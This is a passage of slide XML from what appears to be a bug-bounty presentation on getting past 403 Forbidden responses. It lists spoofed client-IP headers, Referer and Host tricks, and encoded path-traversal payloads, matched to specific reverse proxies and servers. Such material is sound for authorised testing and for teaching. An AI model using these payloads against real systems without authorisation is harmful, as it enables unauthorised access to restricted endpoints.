            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-ProxyUser-Ip: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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77" name="Google Shape;377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GET /authorization-response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User-Agent: Mozilla/5.0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X-ProxyUser-Ip: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1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Referer: https://previous.com/path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78" name="Google Shape;378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9" name="Google Shape;379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81" name="Google Shape;38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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="31284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3" name="Google Shape;38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425" y="2621200"/>
            <a:ext cx="510175" cy="4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Add This Header </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Custom-IP-Authorization: IP-Of-Company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X-Custom-IP-Authorization: 127.0.0.1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89" name="Google Shape;389;p5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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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X-Custom-IP-Authorization: 127.0.0.1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90" name="Google Shape;390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1" name="Google Shape;391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93" name="Google Shape;3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5" name="Google Shape;39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7" name="Google Shape;397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Set These Headers e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Forwarded: 127.0.0.1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X-Forwarded-For: 127.0.0.1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 sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Client-IP: 127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> etc In Your Request Once OR Twice , OR Use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burpFakeIP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403" name="Google Shape;403;p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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/authorization-response HTTP/1.1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Host: www.company.com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X-Forwarded-For: 127.0.0.1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X-Client-IP: 127.0.0.1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X-Real-IP: 127.0.0.1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True-Client-IP: 127.0.0.1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CF-Connecting-IP: 127.0.0.1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X-Cluster-Client-IP: 127.0.0.1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Fastly-Client-IP: 127.0.0.1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X-Originating-IP: 127.0.0.1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X-Remote-IP: 127.0.0.1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X-Remote-Addr: 127.0.0.1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X-Host: 127.0.0.1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X-Forwarded-Host: 127.0.0.1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X-Forwarded-By: 127.0.0.1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User-Agent: Mozilla/5.0</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;p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5" name="Google Shape;405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07" name="Google Shape;40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9" name="Google Shape;409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1" name="Google Shape;411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Add Referer Header With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>403 Forbidden Endpoints e.g.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Referer: https://company.com/authorization-response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417" name="Google Shape;417;p5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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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Referer: https://previous.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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18" name="Google Shape;418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9" name="Google Shape;419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21" name="Google Shape;42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23" name="Google Shape;42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Fuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Agent Header </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Agent: okhttp/4.1.1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429" name="Google Shape;429;p5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/authorization-response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User-Agent: FUZZ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30" name="Google Shape;430;p5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1" name="Google Shape;431;p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33" name="Google Shape;43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5" name="Google Shape;435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1" name="Google Shape;211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Change </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTPS Protocol To HTTP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Vice Versa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If You Got 403 Forbidden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4" name="Google Shape;2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You Got</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFE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403 Forbidden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	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://company.com/authorization-response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Change HTTPS To HTTP</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF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http</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://company.com/authorization-response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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Haproxy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Varnish As Reverse Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Use The Absolute-URI e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET http://comapany.com/authorization-response </a:t>
            </a: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41" name="Google Shape;441;p5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http://company.com/authorization-response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42" name="Google Shape;442;p5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3" name="Google Shape;443;p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45" name="Google Shape;44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447" name="Google Shape;44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Use The Absolute-URI With localhost e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET https://localhost/authorization-response</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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453" name="Google Shape;453;p6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https://localhost/authorization-response/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54" name="Google Shape;454;p6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5" name="Google Shape;455;p6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57" name="Google Shape;45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59" name="Google Shape;45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The Absolute-URI</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And Referer Header With 403 Forbidden Endpoints e.g.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Referer: https://company.com/authorization-response</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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465" name="Google Shape;465;p6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http://company.com/authorization-response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Referer: http://previous.com/authorization-response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66" name="Google Shape;466;p6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7" name="Google Shape;467;p6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69" name="Google Shape;46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71" name="Google Shape;47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7" name="Google Shape;477;p6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79" name="Google Shape;479;p6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Append </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Slash /</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Your Endpoints If You Got 403 Forbidden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0" name="Google Shape;4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2" name="Google Shape;482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5" name="Google Shape;485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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache As Reverse Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Capitalize All Characters e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/AUTHORIZATION-RESPONSE/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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491" name="Google Shape;491;p6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/AUTHORIZATION-RESPONSE/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92" name="Google Shape;492;p6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3" name="Google Shape;493;p6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95" name="Google Shape;49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497" name="Google Shape;497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Change Version Of The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Endpoint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e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You Have</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> api/v4/admin </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To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Change It To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> api/v2/admin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api/v1/admin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503" name="Google Shape;503;p6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/v2/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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04" name="Google Shape;504;p6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05" name="Google Shape;505;p6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07" name="Google Shape;50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09" name="Google Shape;509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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Haproxy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Nuster As Reverse Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Encode The First Character From authorization-response e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/%61uthorization-response </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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15" name="Google Shape;515;p6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/%61uthorization-response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16" name="Google Shape;516;p6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7" name="Google Shape;517;p6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19" name="Google Shape;51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521" name="Google Shape;52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7" name="Google Shape;527;p6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29" name="Google Shape;529;p6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Append %2e </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before The Endpoint e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%2e/authorization-response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30" name="Google Shape;53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32" name="Google Shape;532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34" name="Google Shape;534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Append ..3B </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before The Endpoint e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/..3B/authorization-response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541" name="Google Shape;541;p6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/..3B/authorization-response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42" name="Google Shape;542;p6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3" name="Google Shape;543;p6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45" name="Google Shape;54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47" name="Google Shape;547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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache As Reverse Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Add /200-OK/..// Before authorization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-response e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /200-OK/..//authorization-response </a:t>
            </a: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553" name="Google Shape;553;p6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/200-OK/..//authorization-response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54" name="Google Shape;554;p6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5" name="Google Shape;555;p6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57" name="Google Shape;55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559" name="Google Shape;559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Append</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Host Header With localhost </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: localhost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23" name="Google Shape;223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/authorization-response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Host: localhost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24" name="Google Shape;224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5" name="Google Shape;225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27" name="Google Shape;2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Append </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200-OK/%2e%2e/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Before And After </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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200-OK/%2e%2e/authorization-response/200-OK/%2e%2e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565" name="Google Shape;565;p6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GET </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/200-OK/%2e%2e/authorization-response/200-OK/%2e%2e</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1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Host: www.company.com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User-Agent: Mozilla/5.0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Referer: https://previous.com/path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Origin: https://www.company.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Google Shape;566;p6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7" name="Google Shape;567;p6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6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69" name="Google Shape;56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6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71" name="Google Shape;571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Append 200-OK /%2e%2e/ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before authorization-response e.g.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200-OK /%2e%2e/authorization-response/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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577" name="Google Shape;577;p7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/200-OK /%2e%2e/authorization-response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578" name="Google Shape;578;p7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9" name="Google Shape;579;p7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7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81" name="Google Shape;58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7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83" name="Google Shape;583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Endpoint e.g. admin/info Response With 403 Forbidden And admin/ping Response With 200 OK , Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This Trick admin/ping/;info</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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589" name="Google Shape;589;p7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/200-OK/;authorization-response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90" name="Google Shape;590;p7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1" name="Google Shape;591;p7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7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93" name="Google Shape;59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7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5" name="Google Shape;595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Append</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> %2f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%2e%2f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%252f , %5c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%C0%AF </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before authorization-response e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/%2f/authorization-response/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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601" name="Google Shape;601;p7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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%2f/authorization-response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602" name="Google Shape;602;p7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3" name="Google Shape;603;p7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7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05" name="Google Shape;60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07" name="Google Shape;607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Append</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /..;/ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before authorization-response e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/..;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/authorization-response/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613" name="Google Shape;613;p7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/..;/authorization-response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614" name="Google Shape;614;p7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5" name="Google Shape;615;p7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7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17" name="Google Shape;61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7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19" name="Google Shape;619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Use U+202E: Right-To-Left Override</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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/%2e%80%aeesnopser-noitazirohtua/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625" name="Google Shape;625;p7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/%2e%80%aeesnopser-noitazirohtua/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626" name="Google Shape;626;p7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7" name="Google Shape;627;p7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7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29" name="Google Shape;62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7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31" name="Google Shape;631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Append </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/./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// </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before The Endpoint e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/.//authorization-response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And </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>///authorization-response </a:t>
            </a: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637" name="Google Shape;637;p7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/.//authorization-response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38" name="Google Shape;638;p7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9" name="Google Shape;639;p7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7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41" name="Google Shape;64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7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43" name="Google Shape;643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45" name="Google Shape;64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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nginx As Reverse Proxy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 sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weblogic As Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Use /#/../ Before  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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e.g. 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/#/../authorization-response </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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651" name="Google Shape;651;p7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/#/../authorization-response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52" name="Google Shape;652;p7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53" name="Google Shape;653;p7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7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55" name="Google Shape;65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7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657" name="Google Shape;657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 Server Is  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Tomcat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Jetty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WildFly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WebLogic </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use This </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>api/v4;X=Y/authorization-response </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Access api/v4/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response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663" name="Google Shape;663;p7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/api/v4;X=Y/authorization-response/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64" name="Google Shape;664;p7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65" name="Google Shape;665;p7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7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67" name="Google Shape;66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7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69" name="Google Shape;669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These Tricks e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization-response/.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//authorization-response//</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/./authorization-response/./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authorization-response..;/ </a:t>
            </a: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675" name="Google Shape;675;p7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/./authorization-response/./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76" name="Google Shape;676;p7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7" name="Google Shape;677;p7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79" name="Google Shape;67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7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81" name="Google Shape;681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7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83" name="Google Shape;683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Change</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Host Header To host Header </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ost: comapny.com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35" name="Google Shape;235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/authorization-response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host</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: www.company.com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36" name="Google Shape;236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7" name="Google Shape;237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39" name="Google Shape;2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1" name="Google Shape;24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Append These Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp;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#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%20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%09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../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/../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/..;/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..%2f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\..\.\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.././ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* ..%00/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..%0d/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..%5c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..\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;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..%ff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%2e%2e%2f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.%2e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%3f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%26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%23 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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89" name="Google Shape;689;p7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/authorization-response..%ff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90" name="Google Shape;690;p7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1" name="Google Shape;691;p7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7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93" name="Google Shape;69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95" name="Google Shape;695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7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97" name="Google Shape;697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79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99" name="Google Shape;699;p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50" y="35143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79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01" name="Google Shape;701;p7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4050" y="39187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79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03" name="Google Shape;703;p7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950" y="42976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Append ?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?? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After The Endpoint e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
